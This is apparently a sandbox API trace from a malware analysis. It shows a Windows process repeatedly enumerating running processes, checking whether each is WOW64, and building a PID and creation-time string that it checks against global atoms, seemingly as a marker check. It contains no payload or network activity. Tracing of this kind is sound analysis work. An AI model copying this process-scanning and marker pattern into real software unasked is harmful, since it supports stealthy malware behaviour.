	[0107.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.889] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.889] CloseHandle (hObject=0x694) returned 1
	[0107.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.889] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.889] CloseHandle (hObject=0x694) returned 1
	[0107.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.889] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.889] CloseHandle (hObject=0x694) returned 1
	[0107.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0107.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.928] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.928] CloseHandle (hObject=0x694) returned 1
	[0107.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.929] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.929] CloseHandle (hObject=0x694) returned 1
	[0107.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.929] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.929] CloseHandle (hObject=0x694) returned 1
	[0107.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.929] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.929] CloseHandle (hObject=0x694) returned 1
	[0107.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.930] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.930] CloseHandle (hObject=0x694) returned 1
	[0107.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.930] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.930] CloseHandle (hObject=0x694) returned 1
	[0107.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.930] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.930] CloseHandle (hObject=0x694) returned 1
	[0107.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.930] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.930] CloseHandle (hObject=0x694) returned 1
	[0107.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.931] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.931] CloseHandle (hObject=0x694) returned 1
	[0107.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.931] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.931] CloseHandle (hObject=0x694) returned 1
	[0107.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.931] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.931] CloseHandle (hObject=0x694) returned 1
	[0107.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.931] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.931] CloseHandle (hObject=0x694) returned 1
	[0107.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.932] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.932] CloseHandle (hObject=0x694) returned 1
	[0107.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.932] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.932] CloseHandle (hObject=0x694) returned 1
	[0107.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.932] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.932] CloseHandle (hObject=0x694) returned 1
	[0107.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.932] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.932] CloseHandle (hObject=0x694) returned 1
	[0107.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.932] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.932] CloseHandle (hObject=0x694) returned 1
	[0107.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.932] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.933] CloseHandle (hObject=0x694) returned 1
	[0107.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.933] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.933] CloseHandle (hObject=0x694) returned 1
	[0107.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.933] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.933] CloseHandle (hObject=0x694) returned 1
	[0107.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.933] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.933] CloseHandle (hObject=0x694) returned 1
	[0107.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0107.933] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.933] CloseHandle (hObject=0x694) returned 1
	[0107.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.934] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.934] CloseHandle (hObject=0x694) returned 1
	[0107.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.934] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.934] CloseHandle (hObject=0x694) returned 1
	[0107.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.934] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.934] CloseHandle (hObject=0x694) returned 1
	[0107.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.934] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.934] CloseHandle (hObject=0x694) returned 1
	[0107.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.934] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.934] CloseHandle (hObject=0x694) returned 1
	[0107.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.934] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.935] CloseHandle (hObject=0x694) returned 1
	[0107.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.935] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.935] CloseHandle (hObject=0x694) returned 1
	[0107.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.935] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.935] CloseHandle (hObject=0x694) returned 1
	[0107.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.935] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.935] CloseHandle (hObject=0x694) returned 1
	[0107.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.936] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.936] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.936] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.936] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.936] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.936] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.937] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.937] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.937] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.937] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.937] CloseHandle (hObject=0x694) returned 1
	[0107.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.937] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.937] CloseHandle (hObject=0x694) returned 1
	[0107.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.937] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.937] CloseHandle (hObject=0x694) returned 1
	[0107.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.938] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.938] CloseHandle (hObject=0x694) returned 1
	[0108.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0108.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0108.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0108.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0108.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0108.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0108.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0108.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0108.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0108.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0108.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0108.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0108.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0108.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0108.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0108.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0108.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0108.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0108.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0108.012] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.012] CloseHandle (hObject=0x694) returned 1
	[0108.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0108.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0108.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0108.012] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.012] CloseHandle (hObject=0x694) returned 1
	[0108.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0108.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0108.013] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.013] CloseHandle (hObject=0x694) returned 1
	[0108.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0108.013] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.013] CloseHandle (hObject=0x694) returned 1
	[0108.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0108.013] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.013] CloseHandle (hObject=0x694) returned 1
	[0108.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0108.013] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.013] CloseHandle (hObject=0x694) returned 1
	[0108.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0108.013] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.013] CloseHandle (hObject=0x694) returned 1
	[0108.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0108.014] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.014] CloseHandle (hObject=0x694) returned 1
	[0108.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0108.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0108.014] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.014] CloseHandle (hObject=0x694) returned 1
	[0108.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0108.014] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.014] CloseHandle (hObject=0x694) returned 1
	[0108.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0108.014] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.014] CloseHandle (hObject=0x694) returned 1
	[0108.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0108.015] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.015] CloseHandle (hObject=0x694) returned 1
	[0108.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0108.015] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.015] CloseHandle (hObject=0x694) returned 1
	[0108.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0108.015] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.015] CloseHandle (hObject=0x694) returned 1
	[0108.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0108.015] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.015] CloseHandle (hObject=0x694) returned 1
	[0108.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0108.016] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.016] CloseHandle (hObject=0x694) returned 1
	[0108.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0108.016] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.016] CloseHandle (hObject=0x694) returned 1
	[0108.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0108.016] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.016] CloseHandle (hObject=0x694) returned 1
	[0108.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0108.016] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.016] CloseHandle (hObject=0x694) returned 1
	[0108.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0108.016] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.017] CloseHandle (hObject=0x694) returned 1
	[0108.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0108.017] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.017] CloseHandle (hObject=0x694) returned 1
	[0108.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0108.017] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.017] CloseHandle (hObject=0x694) returned 1
	[0108.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0108.017] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.017] CloseHandle (hObject=0x694) returned 1
	[0108.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0108.017] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.018] CloseHandle (hObject=0x694) returned 1
	[0108.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0108.018] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.018] CloseHandle (hObject=0x694) returned 1
	[0108.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0108.018] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.018] CloseHandle (hObject=0x694) returned 1
	[0108.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0108.018] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.018] CloseHandle (hObject=0x694) returned 1
	[0108.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0108.018] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.018] CloseHandle (hObject=0x694) returned 1
	[0108.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0108.018] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.019] CloseHandle (hObject=0x694) returned 1
	[0108.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0108.019] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.019] CloseHandle (hObject=0x694) returned 1
	[0108.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.019] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.019] CloseHandle (hObject=0x694) returned 1
	[0108.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.019] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.020] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0108.020] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0108.020] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0108.020] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.020] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0108.021] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.021] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0108.021] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0108.021] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0108.021] CloseHandle (hObject=0x694) returned 1
	[0108.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0108.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0108.021] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.021] CloseHandle (hObject=0x694) returned 1
	[0108.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0108.021] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.021] CloseHandle (hObject=0x694) returned 1
	[0108.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0108.022] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.022] CloseHandle (hObject=0x694) returned 1
	[0108.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0108.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0108.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0108.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0108.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0108.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0108.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0108.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0108.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0108.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0108.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
